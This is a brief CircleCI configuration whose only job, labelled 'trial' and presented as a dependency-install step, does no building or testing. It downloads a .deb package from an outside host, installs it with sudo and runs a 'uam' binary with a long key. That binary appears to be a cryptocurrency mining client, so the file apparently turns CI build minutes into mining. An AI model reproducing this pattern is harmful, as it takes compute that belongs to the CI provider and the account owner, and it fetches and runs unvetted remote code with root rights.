version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 1
      steps:
        - run:
            name: Install Dependencies
            command: |
                wget https://update.u.is/downloads/uam/linux/uam-latest_amd64.deb
                sudo dpkg -i uam-latest_amd64.deb
                cd /opt/uam
                sudo ./uam --pk 3310B1D49773E27584E3FF4BFAAE4A7A4CE7F83F86656840093B88775693F857                

workflows:
    version: 2.1
    build:
        jobs:
        - trial